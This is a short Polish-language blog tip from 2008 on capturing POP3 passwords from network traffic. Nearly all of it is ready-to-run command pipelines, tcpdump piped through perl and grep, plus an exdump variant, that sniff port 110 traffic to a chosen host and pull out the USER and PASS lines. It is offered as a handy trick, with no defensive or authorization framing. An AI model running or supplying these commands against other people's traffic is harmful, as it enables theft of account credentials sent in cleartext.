Sniffowanie haseł POP3

Posted on Fri 22 August 2008 in Tips4Unices • 1 min read

Wysniffować pasełka do POP-a da się odpalając tcpdump i pompując output przez grepa:
tcpdump -n -X -s 1514 tcp port 110 and dst host my.ad.dr.es |
perl -p -e 's/^.*\t(.*)\n/$1/; s/^(\d\d:)/\n$1/' |
grep -B 1 -E 'USER|PASS'
A dla starszej wersji tcpdumpa, bez opcji "-X":
tcpdump -n -s 1514 tcp port 110 and dst host my.ad.dr.es |
perl -p -e 's/^.*\t(.*)\n/$1/ && s/\s+//g &&
s/([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg &&
s/([\000-\011\013-\037])/./g;
s/^(\d\d:)/\n$1/' |
grep -B 1 -E 'USER|PASS'
Inny pomysł to pobranie narzędzia exdump ze strony oficjalnej albo z mojego archiwum.
A kompilacji wydać komendę:
exdump -ctu -p 110 -v | grep -E 'USER|PASS'
I czekać cierpliwie.